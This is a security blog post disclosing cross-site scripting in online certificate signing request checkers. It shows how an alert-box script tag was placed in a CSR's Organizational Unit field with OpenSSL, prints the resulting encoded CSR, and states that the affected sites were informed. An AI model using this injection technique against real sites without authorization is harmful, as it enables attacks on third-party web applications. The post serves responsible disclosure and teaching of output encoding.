Binaryfigments

XSS in a certificate signing request


Web application developers all know never to trust the input of the users of their web application. But what if you do not really know what they are submitting? While investigating some form fields in our application, I came across a form for checking a certificate signing request (CSR), which you need in order to order an SSL / TLS certificate.

What is a CSR

A certificate signing request, CSR, is an encoded file with the information needed to request a certificate from a certificate authority (CA) or a reseller of that CA. You create that file yourself and fill in the information you want, which means you can put anything you like in it.

For example, something like this:

<script>alert('attacked')</script>

You could also try an SQL injection if the CA or the reseller stores the information from the CSR in an SQL database for later use.

Examples

Here are some examples of websites that didn't validate the data in the CSR. They just decoded the CSR and put the data on the screen as it is.

Note: All the tested websites are informed about this.

This is the CSR I used in all cases:

-----BEGIN CERTIFICATE REQUEST-----
MIICzjCCAbYCAQAwgYgxCzAJBgNVBAYTAk5MMRAwDgYDVQQIDAdVdHJlY2h0MRAw
DgYDVQQHDAdVdHJlY2h0MRIwEAYDVQQKDAlOdzRhbGwgQlYxKzApBgNVBAsMIjxz
Y3JpcHQ+YWxlcnQoJ2F0dGFja2VkJyk8L3NjcmlwdD4xFDASBgNVBAMMC3d3dy5v
Y3NyLm5sMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3UpBMvJ8Cc1N
FoTI083bzoXhVXaPxN4M/gqWZYSs7RCfkYyAwabLzw9zQeybUa1SXmvAcQjvfsYe
LJvZpHlY6XIbgaS8JXu5WCkYS6nTN5TDwzghNfCHRA65s47uEuVrXq6P5/Xm9ETp
v9yLTBzAL7sci/6oGq/7qKHfuypG08TRhj/GRraA67ZuDbw6u8uMB2YzTbkgxsDM
YUgamCLeLq39wLQNE4a+fWaxbp2XME30hRXONGI/yYDjavwNl6fXJ1A4fMktzzJd
bsQRVRAyEu04Aw48d8NAN1EDkUBBTneRRWMXWO9bfHSPLK+9E/6ntJu63P8I4llk
IR+hFU0uaQIDAQABoAAwDQYJKoZIhvcNAQELBQADggEBAA3QbR9+mxgR9socp21l
WWAQCA5D+JWs8yO3QfXZA4+3IAlqQtKEyz8j0Mncra7yI9QGasnTlnbOPIASb3WY
No/5GlWxzoMivSRHSBUHhg+gly1ZcpPsgKf37aYNFxOX40Fwr3rUSRPDiqx35eQ0
ECY/1GiPyOqH3t6ck41A1Y+d4WCHHI6g6QJp1ZGS98aDRxel4yaJRGqJf1NKMrqE
OScbogqLjD9XnrnTK1dUGUPKx0hpJ5EyYmSmweAxmE6AfffVw/+8QUbnMxyD0j8j
sUy/bACF0UCwBntRzZ17aZ8WHRq3zKeA3y3s/zU7JKS4ZJjP2rD3dGAIeSPN/nHv
9tI=
-----END CERTIFICATE REQUEST-----

You can check the contents of it here:

https://cryptoreport.websecurity.symantec.com/checker/views/csrCheck.jsp

How I made the CSR

Generating the CSR was easy. It is like creating a normal CSR, but with some code in one field. I used OpenSSL on my Linux machine to generate the CSR. In the terminal session below you can see where I put in the XSS: the Organizational Unit Name line.

[email protected]:~$ openssl req -utf8 -nodes -sha256 -newkey rsa:2048 -keyout private2.key -out cert2.csr
Generating a 2048 bit RSA private key
............................+++
.+++
writing new private key to 'private2.key'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:NL
State or Province Name (full name) [Some-State]:Utrecht
Locality Name (eg, city) []:Utrecht
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Nw4all BV
Organizational Unit Name (eg, section) []:<script>alert('attacked')</script>
Common Name (e.g. server FQDN or YOUR name) []:www.ocsr.nl
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

[email protected]:~$

Conclusion

What can we learn from this? Do not only check your input, but also encode the results that will be displayed on the screen.

  • Update 2017-09-29: Most of them updated their website.
  • Update 2017-10-14: One certificate reseller didn’t understand the problem.